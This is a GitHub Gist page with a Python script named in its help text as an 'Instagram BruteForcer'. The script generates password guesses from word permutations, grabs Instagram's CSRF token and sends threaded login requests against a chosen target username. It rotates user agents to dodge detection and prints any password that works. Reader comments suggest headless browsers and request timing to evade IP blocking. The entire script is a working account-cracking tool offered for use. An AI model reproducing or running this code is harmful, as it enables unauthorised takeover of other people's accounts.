Last active
September 21, 2017 22:26
-
-
Save eteamin/78a7753e2555275c03bab199c8cc7022 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import print_function | |
| import itertools | |
| import argparse | |
| import random | |
| import threading | |
| import subprocess | |
| import time | |
| try: | |
| import urllib.request as rq | |
| from urllib.error import HTTPError | |
| import urllib.parse as http_parser | |
| except ImportError: | |
| import urllib2 as rq | |
| from urllib2 import HTTPError | |
| import urllib as http_parser | |
| try: | |
| import Queue | |
| except ImportError: | |
| import queue as Queue | |
| class bcolors: | |
| HEADER = '\033[94m' | |
| OKGREEN = '\033[92m' | |
| WARNING = '\033[93m' | |
| FAIL = '\033[91m' | |
| ENDC = '\033[0m' | |
| BOLD = '\033[1m' | |
| UNDERLINE = '\033[4m' | |
| def generate_words(): | |
| _words = [] | |
| with open('words.txt', 'r') as input_words: | |
| inputs = input_words.read().split('\n') | |
| combs_group = itertools.permutations(inputs, 1) | |
| combs_group1 = itertools.permutations(inputs, 2) | |
| combs_group2 = itertools.permutations(inputs, 3) | |
| for p in combs_group: | |
| _words.append(''.join(p)) | |
| for p in combs_group1: | |
| _words.append(''.join(p)) | |
| for p in combs_group2: | |
| _words.append(''.join(p)) | |
| return _words | |
| def change_ip(): | |
| pass | |
| def get_csrf(): | |
| """ | |
| get CSRF token from login page to use in POST requests | |
| """ | |
| global csrf_token | |
| print(bcolors.WARNING + "[+] Getting CSRF Token: " + bcolors.ENDC) | |
| try: | |
| opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler()) | |
| opener.addheaders = [('User-agent', 'Mozilla/5.0')] | |
| rq.install_opener(opener) | |
| request = rq.Request('https://www.instagram.com/') | |
| try: | |
| # python 2 | |
| headers = rq.urlopen(request).info().headers | |
| except Exception: | |
| # python 3 | |
| headers = rq.urlopen(request).info().get_all('Set-Cookie') | |
| for header in headers: | |
| if header.find('csrftoken') != -1: | |
| csrf_token = header.partition(';')[0].partition('=')[2] | |
| print(bcolors.OKGREEN + "[+] CSRF Token :", csrf_token, "\n" + bcolors.ENDC) | |
| except Exception as err: | |
| print(bcolors.FAIL + "[!] Can't get CSRF token , please use -d for debug" + bcolors.ENDC) | |
| print(bcolors.FAIL + "[!] Exiting..." + bcolors.ENDC) | |
| exit(3) | |
| def brute(q): | |
| if not q.empty(): | |
| try: | |
| word = q.get() | |
| word = word.replace("\r", "").replace("\n", "") | |
| post_data = { | |
| 'username': USER, | |
| 'password': word, | |
| } | |
| header = { | |
| "User-Agent": random.choice(user_agents), | |
| 'X-Instagram-AJAX': '1', | |
| "X-CSRFToken": csrf_token, | |
| "X-Requested-With": "XMLHttpRequest", | |
| "Referer": "https://www.instagram.com/", | |
| "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", | |
| 'Cookie': 'csrftoken=' + csrf_token | |
| } | |
| if _verbose: | |
| print(bcolors.BOLD + "Trying %s" % word) | |
| opener = rq.build_opener( | |
| rq.HTTPHandler(), | |
| rq.HTTPSHandler() | |
| ) | |
| rq.install_opener(opener) | |
| req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header) | |
| sock = rq.urlopen(req) | |
| if sock.read().decode().find('"authenticated": true') != -1: | |
| print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login:") | |
| print("---------------------------------------------------") | |
| print("[!]Username: ", USER) | |
| print("[!]Password: ", word) | |
| print("---------------------------------------------------\n" + bcolors.ENDC) | |
| found_flag = True | |
| q.queue.clear() | |
| q.task_done() | |
| except HTTPError as e: | |
| if e.getcode() == 400 or e.getcode() == 403: | |
| if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1: | |
| print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login " | |
| + bcolors.FAIL + "But need Checkpoint :|" + bcolors.OKGREEN) | |
| print("---------------------------------------------------") | |
| print("[!]Username: ", USER) | |
| print("[!]Password: ", word) | |
| print("---------------------------------------------------\n" + bcolors.ENDC) | |
| found_flag = True | |
| q.queue.clear() | |
| q.task_done() | |
| return | |
| else: | |
| change_ip() | |
| else: | |
| print("Error:", e.getcode()) | |
| q.task_done() | |
| return | |
| except Exception as err: | |
| print(bcolors.FAIL + "[!] Unknown Error in request, please turn on debug mode with -d" + bcolors.ENDC) | |
| return | |
| def starter(): | |
| global found_flag | |
| queue = Queue.Queue() | |
| threads = [] | |
| max_thread = THREAD | |
| found_flag = False | |
| queuelock = threading.Lock() | |
| print(bcolors.HEADER + "\n[!] Initializing Workers") | |
| print("[!] Start Cracking ... \n" + bcolors.ENDC) | |
| try: | |
| for word in words: | |
| queue.put(word) | |
| while not queue.empty(): | |
| queuelock.acquire() | |
| for workers in range(max_thread): | |
| t = threading.Thread(target=brute, args=(queue,)) | |
| t.setDaemon(True) | |
| t.start() | |
| threads.append(t) | |
| for t in threads: | |
| t.join() | |
| queuelock.release() | |
| if found_flag: | |
| break | |
| print(bcolors.OKGREEN + "\n--------------------") | |
| print("[!] Brute complete !" + bcolors.ENDC) | |
| except Exception as err: | |
| print(err) | |
| if __name__ == "__main__": | |
| parser = argparse.ArgumentParser( | |
| description="Instagram BruteForcer", | |
| epilog="./instabrute -u user_test -t 4 -d -v" | |
| ) | |
| # required argument | |
| parser.add_argument('-u', '--username', action="store", required=True, | |
| help='Target Username') | |
| # optional arguments | |
| parser.add_argument('-t', '--thread', help='Thread', type=int, default=4) | |
| parser.add_argument('-v', '--verbose', action='store_const', help='Thread', const=True, default=False) | |
| parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False) | |
| args = parser.parse_args() | |
| URL = "https://www.instagram.com/accounts/login/ajax/" | |
| USER = args.username | |
| THREAD = args.thread | |
| _verbose = args.verbose | |
| user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)", | |
| "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)", | |
| "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1", | |
| "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)", | |
| "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201", | |
| "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", | |
| "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"] | |
| words = generate_words() | |
| print(bcolors.OKGREEN + "[+] Username Loaded:", bcolors.BOLD + USER + bcolors.ENDC) | |
| print(bcolors.OKGREEN + "[+] Words Loaded:", bcolors.BOLD + str(len(words)) + bcolors.ENDC) | |
| print(bcolors.ENDC) | |
| get_csrf() | |
| starter() |
before that i thing using some headless web browsers would be such a good choice to not generate headers manually
like phantomJs
and if you can schedule the request time you wont need changing ip address.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
change_ip is some VPN account to login
is that rue?